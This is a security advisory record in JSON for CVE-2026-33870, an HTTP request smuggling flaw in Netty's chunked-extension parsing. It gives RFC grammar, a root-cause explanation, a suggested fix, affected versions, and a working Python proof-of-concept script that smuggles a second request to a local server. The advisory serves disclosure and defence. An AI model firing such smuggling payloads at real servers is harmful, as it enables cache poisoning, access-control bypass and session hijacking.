{"schema_version":"1.7.5","id":"GHSA-pwqr-wmgm-9rr8","published":"2026-03-26T18:48:55Z","modified":"2026-03-27T22:04:14.372867Z","aliases":["CVE-2026-33870"],"related":["CGA-wf6r-m9m7-hvjf"],"summary":"Netty: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing","details":"## Summary\n\nNetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.\n\n## Background\n\nThis vulnerability is a new variant discovered during research into the \"Funky Chunks\" HTTP request smuggling techniques:\n\n- <https://w4ke.info/2025/06/18/funky-chunks.html>\n- <https://w4ke.info/2025/10/29/funky-chunks-2.html>\n\nThe original research tested various chunk extension parsing differentials but did not cover quoted-string handling within extension values.\n\n## Technical Details\n\n**RFC 9110 Section 7.1.1** defines chunked transfer encoding:\n\n```\nchunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF\nchunk-ext = *( BWS \";\" BWS chunk-ext-name [ BWS \"=\" BWS chunk-ext-val ] )\nchunk-ext-val = token / quoted-string\n```\n\n**RFC 9110 Section 5.6.4** defines quoted-string:\n\n```\nquoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE\n```\n\nCritically, the allowed character ranges within a quoted-string are:\n\n```\nqdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text\nquoted-pair = \"\\\" ( HTAB / SP / VCHAR / obs-text )\n```\n\nCR (`%x0D`) and LF (`%x0A`) bytes fall outside all of these ranges and are therefore **not permitted** inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a `400 Bad Request` response (as Squid does, for example).\n\n## Vulnerability\n\nNetty terminates chunk header parsing at `\\r\\n` inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.\n\n**Expected behavior (RFC-compliant):**\nA request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.\n\n**Actual behavior (Netty):**\n\n```\nChunk: 1;a=\"value\n            ^^^^^ parsing terminates here at \\r\\n (INCORRECT)\nBody: here\"... is treated as body or the beginning of a subsequent request\n```\n\nThe root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.\n\n## Proof of Concept\n\n```python\n#!/usr/bin/env python3\nimport socket\n\npayload = (\n    b\"POST / HTTP/1.1\\r\\n\"\n    b\"Host: localhost\\r\\n\"\n    b\"Transfer-Encoding: chunked\\r\\n\"\n    b\"\\r\\n\"\n    b'1;a=\"\\r\\n'\n    b\"X\\r\\n\"\n    b\"0\\r\\n\"\n    b\"\\r\\n\"\n    b\"GET /smuggled HTTP/1.1\\r\\n\"\n    b\"Host: localhost\\r\\n\"\n    b\"Content-Length: 11\\r\\n\"\n    b\"\\r\\n\"\n    b'\"\\r\\n'\n    b\"Y\\r\\n\"\n    b\"0\\r\\n\"\n    b\"\\r\\n\"\n)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(3)\nsock.connect((\"127.0.0.1\", 8080))\nsock.sendall(payload)\n\nresponse = b\"\"\nwhile True:\n    try:\n        chunk = sock.recv(4096)\n        if not chunk:\n            break\n        response += chunk\n    except socket.timeout:\n        break\n\nsock.close()\nprint(f\"Responses: {response.count(b'HTTP/')}\")\nprint(response.decode(errors=\"replace\"))\n```\n\n**Result:** The server returns two HTTP responses from a single TCP connection, confirming request smuggling.\n\n### Parsing Breakdown\n\n| Parser                | Request 1         | Request 2                          |\n|-----------------------|-------------------|------------------------------------|\n| Netty (vulnerable)    | POST / body=\"X\"  | GET /smuggled (SMUGGLED)           |\n| RFC-compliant parser  | 400 Bad Request   | (none — malformed request rejected)|\n\n## Impact\n\n- **Request Smuggling**: An attacker can inject arbitrary HTTP requests into a connection.\n- **Cache Poisoning**: Smuggled responses may poison shared caches.\n- **Access Control Bypass**: Smuggled requests can circumvent frontend security controls.\n- **Session Hijacking**: Smuggled requests may intercept responses intended for other users.\n\n## Reproduction\n\n1. Start the minimal proof-of-concept environment using the provided Docker configuration.\n2. Execute the proof-of-concept script included in the attached archive.\n\n## Suggested Fix\n\nThe parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:\n\n```\n1. Read chunk-size.\n2. If ';' is encountered, begin parsing extensions:\n   a. For each byte before the terminating CRLF:\n      - If CR (%x0D) or LF (%x0A) is encountered outside the\n        final terminating CRLF, reject the request with 400 Bad Request.\n   b. If the extension value begins with DQUOTE, validate that all\n      enclosed bytes conform to the qdtext / quoted-pair grammar.\n3. Only treat CRLF as the chunk header terminator when it appears\n   outside any quoted-string context and contains no preceding\n   illegal bytes.\n```\n\n## Acknowledgments\n\nCredit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.\n\n## Resources\n\n- [RFC 9110: HTTP Semantics (Sections 5.6.4, 7.1.1)](https://www.rfc-editor.org/rfc/rfc9110)\n- [Funky Chunks Research](https://w4ke.info/2025/06/18/funky-chunks.html)\n- [Funky Chunks 2 Research](https://w4ke.info/2025/10/29/funky-chunks-2.html)\n\n## Attachments\n\n![Vulnerability Diagram](https://github.com/user-attachments/assets/2faaa23e-693b-4efc-afb7-aae1d4101e7e)\n\n[java_netty.zip](https://github.com/user-attachments/files/24697955/java_netty.zip)","affected":[{"package":{"name":"io.netty:netty-codec-http","ecosystem":"Maven","purl":"pkg:maven/io.netty/netty-codec-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.1.132.Final"}]}],"versions":["4.0.0.Alpha1","4.0.0.Alpha2","4.0.0.Alpha3","4.0.0.Alpha4","4.0.0.Alpha5","4.0.0.Alpha6","4.0.0.Alpha7","4.0.0.Alpha8","4.0.0.Beta1","4.0.0.Beta2","4.0.0.Beta3","4.0.0.CR1","4.0.0.CR2","4.0.0.CR3","4.0.0.CR4","4.0.0.CR5","4.0.0.CR6","4.0.0.CR7","4.0.0.CR8","4.0.0.CR9","4.0.0.Final","4.0.1.Final","4.0.10.Final","4.0.11.Final","4.0.12.Final","4.0.13.Final","4.0.14.Beta1","4.0.14.Final","4.0.15.Final","4.0.16.Final","4.0.17.Final","4.0.18.Final","4.0.19.Final","4.0.2.Final","4.0.20.Final","4.0.21.Final","4.0.22.Final","4.0.23.Final","4.0.24.Final","4.0.25.Final","4.0.26.Final","4.0.27.Final","4.0.28.Final","4.0.29.Final","4.0.3.Final","4.0.30.Final","4.0.31.Final","4.0.32.Final","4.0.33.Final","4.0.34.Final","4.0.35.Final","4.0.36.Final","4.0.37.Final","4.0.38.Final","4.0.39.Final","4.0.4.Final","4.0.40.Final","4.0.41.Final","4.0.42.Final","4.0.43.Final","4.0.44.Final","4.0.45.Final","4.0.46.Final","4.0.47.Final","4.0.48.Final","4.0.49.Final","4.0.5.Final","4.0.50.Final","4.0.51.Final","4.0.52.Final","4.0.53.Final","4.0.54.Final","4.0.55.Final","4.0.56.Final","4.0.6.Final","4.0.7.Final","4.0.8.Final","4.0.9.Final","4.1.0.Beta1","4.1.0.Beta2","4.1.0.Beta3","4.1.0.Beta4","4.1.0.Beta5","4.1.0.Beta6","4.1.0.Beta7","4.1.0.Beta8","4.1.0.CR1","4.1.0.CR2","4.1.0.CR3","4.1.0.CR4","4.1.0.CR5","4.1.0.CR6","4.1.0.CR7","4.1.0.Final","4.1.1.Final","4.1.10.Final","4.1.100.Final","4.1.101.Final","4.1.102.Final","4.1.103.Final","4.1.104.Final","4.1.105.Final","4.1.106.Final","4.1.107.Final","4.1.108.Final","4.1.109.Final","4.1.11.Final","4.1.110.Final","4.1.111.Final","4.1.112.Final","4.1.113.Final","4.1.114.Final","4.1.115.Final","4.1.116.Final","4.1.117.Final","4.1.118.Final","4.1.119.Final","4.1.12.Final","4.1.120.Final","4.1.121.Final","4.1.122.Final","4.1.123.Final","4.1.124.Final","4.1.125.Final","4.1.126.Final","4.1.127.Final","4.1.128.Final","4.1.129.Final","4.1.13.Final","4.1.130.Final","4.1.131.Final","4.1.14.Final","4.1.15.Final","4.1.16.Final","4.1.17.Final","4.1.18.Final","4.1.19.Final","4.1.2.Final","4.1.20.Final","4.1.21.Final","4.1.22.Final","4.1.23.Final","4.1.24.Final","4.1.25.Final","4.1.26.Final","4.1.27.Final","4.1.28.Final","4.1.29.Final","4.1.3.Final","4.1.30.Final","4.1.31.Final","4.1.32.Final","4.1.33.Final","4.1.34.Final","4.1.35.Final","4.1.36.Final","4.1.37.Final","4.1.38.Final","4.1.39.Final","4.1.4.Final","4.1.40.Final","4.1.41.Final","4.1.42.Final","4.1.43.Final","4.1.44.Final","4.1.45.Final","4.1.46.Final","4.1.47.Final","4.1.48.Final","4.1.49.Final","4.1.5.Final","4.1.50.Final","4.1.51.Final","4.1.52.Final","4.1.53.Final","4.1.54.Final","4.1.55.Final","4.1.56.Final","4.1.57.Final","4.1.58.Final","4.1.59.Final","4.1.6.Final","4.1.60.Final","4.1.61.Final","4.1.62.Final","4.1.63.Final","4.1.64.Final","4.1.65.Final","4.1.66.Final","4.1.67.Final","4.1.68.Final","4.1.69.Final","4.1.7.Final","4.1.70.Final","4.1.71.Final","4.1.72.Final","4.1.73.Final","4.1.74.Final","4.1.75.Final","4.1.76.Final","4.1.77.Final","4.1.78.Final","4.1.79.Final","4.1.8.Final","4.1.80.Final","4.1.81.Final","4.1.82.Final","4.1.83.Final","4.1.84.Final","4.1.85.Final","4.1.86.Final","4.1.87.Final","4.1.88.Final","4.1.89.Final","4.1.9.Final","4.1.90.Final","4.1.91.Final","4.1.92.Final","4.1.93.Final","4.1.94.Final","4.1.95.Final","4.1.96.Final","4.1.97.Final","4.1.98.Final","4.1.99.Final"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-pwqr-wmgm-9rr8/GHSA-pwqr-wmgm-9rr8.json"}},{"package":{"name":"io.netty:netty-codec-http","ecosystem":"Maven","purl":"pkg:maven/io.netty/netty-codec-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"4.2.0.Alpha1"},{"fixed":"4.2.10.Final"}]}],"versions":["4.2.0.Alpha1","4.2.0.Alpha2","4.2.0.Alpha3","4.2.0.Alpha4","4.2.0.Alpha5","4.2.0.Beta1","4.2.0.Final","4.2.0.RC1","4.2.0.RC2","4.2.0.RC3","4.2.0.RC4","4.2.1.Final","4.2.2.Final","4.2.3.Final","4.2.4.Final","4.2.5.Final","4.2.6.Final","4.2.7.Final","4.2.8.Final","4.2.9.Final"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-pwqr-wmgm-9rr8/GHSA-pwqr-wmgm-9rr8.json"}}],"references":[{"type":"WEB","url":"https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33870"},{"type":"PACKAGE","url":"https://github.com/netty/netty"},{"type":"WEB","url":"https://w4ke.info/2025/06/18/funky-chunks.html"},{"type":"WEB","url":"https://w4ke.info/2025/10/29/funky-chunks-2.html"},{"type":"WEB","url":"https://www.rfc-editor.org/rfc/rfc9110"}],"database_specific":{"cwe_ids":["CWE-444"],"github_reviewed":true,"github_reviewed_at":"2026-03-26T18:48:55Z","nvd_published_at":"2026-03-27T20:16:34Z","severity":"HIGH"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}]}